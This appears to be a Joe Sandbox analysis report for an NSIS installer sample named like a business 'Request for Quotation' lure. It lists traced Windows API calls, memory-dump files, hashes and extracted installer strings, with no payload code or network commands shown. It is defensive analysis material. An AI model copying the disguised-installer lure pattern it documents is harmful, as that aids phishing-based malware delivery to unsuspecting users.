                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                  • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                  • API String ID: 2803837635-787788815
                                                                                                                                  • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                  • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                                                                                  • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                                                                                  • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                                                                                  APIs
                                                                                                                                  • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00427180,00000400), ref: 0040604D
                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(00427180,00000400), ref: 00406060
                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,00427180), ref: 004060AA
                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                  • lstrcatW.KERNEL32(00427180,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                  • lstrlenW.KERNEL32(00427180,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                  Strings
                                                                                                                                  • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004060D3
                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040601B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                  • API String ID: 900638850-730719616
                                                                                                                                  • Opcode ID: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                  • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                  • Opcode Fuzzy Hash: 6742d19b0b1c5090879c3cfba661a75a2238e305d4f85b0b169f5eea2b4c5ff0
                                                                                                                                  • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E
                                                                                                                                  APIs
                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 004041B3
                                                                                                                                  • GetSysColor.USER32(00000000), ref: 004041CF
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 004041DB
                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 004041E7
                                                                                                                                  • GetSysColor.USER32(?), ref: 004041FA
                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 0040420A
                                                                                                                                  • DeleteObject.GDI32(?), ref: 00404224
                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 0040422E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                  • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                  • Instruction ID: 80eb99ce468fafd782bf4c41e5e54efb1aa93a8fb2f83beca87368335cd0d861
                                                                                                                                  • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                                                  • Instruction Fuzzy Hash: B221C6B1904744ABCB219F68DD08B4B7BF8AF40710F04896DF951F26E1C738E944CB65
                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                                                    • Part of subcall function 00405BD9: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330C,00409230,00409230,004031FE,00413E78,00004000,?,00000000,?), ref: 00405BED
                                                                                                                                    • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                                                  • String ID: 9
                                                                                                                                  • API String ID: 1149667376-2366072709
                                                                                                                                  • Opcode ID: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                  • Instruction ID: 2cb5264777941c8734ead6492e5e892e31f06070e548dc8493562ac8cc7c1c9a
                                                                                                                                  • Opcode Fuzzy Hash: 5bf3696fc1b43342bc1c7e4b21794d67987bb543e605c58fae928a8d5a7d4e33
                                                                                                                                  • Instruction Fuzzy Hash: B551E971E04209ABDF24DF94DE88AAEB779FF04304F50443BE501B62D0D7B99A42CB69
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                                                  • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3294113728-0
                                                                                                                                  • Opcode ID: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                  • Instruction ID: c52f99eb37a0f9a93b384f1dc8ea19ce670fa72408cf6cd502fc0ac50d833161
                                                                                                                                  • Opcode Fuzzy Hash: 120950de23c25218e4c137f2e62925978e01813800c9cf407bd4cdabe4d04e4e
                                                                                                                                  • Instruction Fuzzy Hash: AC31A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                  • lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                  • lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                  • SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  • Opcode ID: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                  • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                                                                                  • Opcode Fuzzy Hash: aabeaaca48730acbc73074f8e678aaac97ab8e564c9cd04649984117108eee2c
                                                                                                                                  • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                                                  • wsprintfW.USER32 ref: 00402D81
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                                                    • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 722711167-2449383134
                                                                                                                                  • Opcode ID: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                  • Instruction ID: 10fb19a6c4b2eae8d62923eb178f02f9fc5b3c6af7becd3ce095817841e91703
                                                                                                                                  • Opcode Fuzzy Hash: 37da5e6e22464c23d40ec4d31b3b8eabf55409bf9acffd0f2ef74a8860773cf4
                                                                                                                                  • Instruction Fuzzy Hash: 2901A130949220EBD7626B60AF1DAEA3B68EF01704F1445BBF901B11E0C6FC9D01CA9E
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A79
                                                                                                                                  • GetMessagePos.USER32 ref: 00404A81
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404A9B
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAD
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                  • Instruction ID: cab112d5f89b67c13374b27971796476edbf79a01bfb7ffc6895eaaae0ed81f2
                                                                                                                                  • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                                                  • Instruction Fuzzy Hash: 1C014C71E40219BADB00DB94DD85BFEBBB8AB55715F10012ABB11B61C0C7B4A9018BA5
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                                                  • wsprintfW.USER32 ref: 00402CD1
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                                  • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                  • Instruction ID: 78b67de6d16717a489960d5e53e23e1f77e1f7f38f635152e8b2699b13fa448d
                                                                                                                                  • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                                                                                                  • Instruction Fuzzy Hash: EAF06270504108ABEF205F50CD4ABAE3768BB00309F00803AFA16B91D0CBF95959DF59
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403192
                                                                                                                                    • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                                                  • WriteFile.KERNEL32(0040BE78,?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$Pointer$CountTickWrite
                                                                                                                                  • String ID: x>A
                                                                                                                                  • API String ID: 2146148272-3854404225
                                                                                                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                  • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                                                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                                                                                  • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061E1
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                                                                                  • CharNextW.USER32(?,00434000,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 004061F5
                                                                                                                                  • CharPrevW.USER32(?,?,00436800,00436800,00000000,00403332,00436800,76F93420,00403512), ref: 00406208
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                  • Instruction ID: e0619f79a043cffb4c3b00824a243f33de9385cd0f0c41224b0956f888f04927
                                                                                                                                  • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                                                                                                  • Instruction Fuzzy Hash: 3511C47680021295EB307B548C40BB762F8EF957A0F56403FE996B72C2E77C5C9282BD
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 0040252F
                                                                                                                                  • lstrlenA.KERNEL32(00409D80,?,?,0040A580,000000FF,00409D80,00000400,?,?,00000021), ref: 00402536
                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00409D80,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000005.00000002.2809614839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000005.00000002.2809587637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809635003.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809662370.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000005.00000002.2809690813.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Request for Quotation New collaboration.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                                                  • String ID: 8
                                                                                                                                  • API String ID: 1453599865-4194326291
                                                                                                                                  • Opcode ID: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                  • Instruction ID: b6741c74acf97665735c623be1ff62c12e58b25bca11cb73faf7774dd427f28f
                                                                                                                                  • Opcode Fuzzy Hash: 9598e7bf0115d7b54bac2ba601592103c37d762dad4affe4391b543117dffca7
                                                                                                                                  • Instruction Fuzzy Hash: A5019671A44204FBD700AFA0DE49EAF7278AB50319F20053BF102B61D2D7BC5D41DA2D
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,00409580,00435000,?,?,00000031), ref: 00401793
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,00409580,00409580,00000000,00000000,00409580,00435000,?,?,00000031), ref: 004017B8
                                                                                                                                    • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                    • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                    • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                    • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                    • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                                  Memory Dump Source
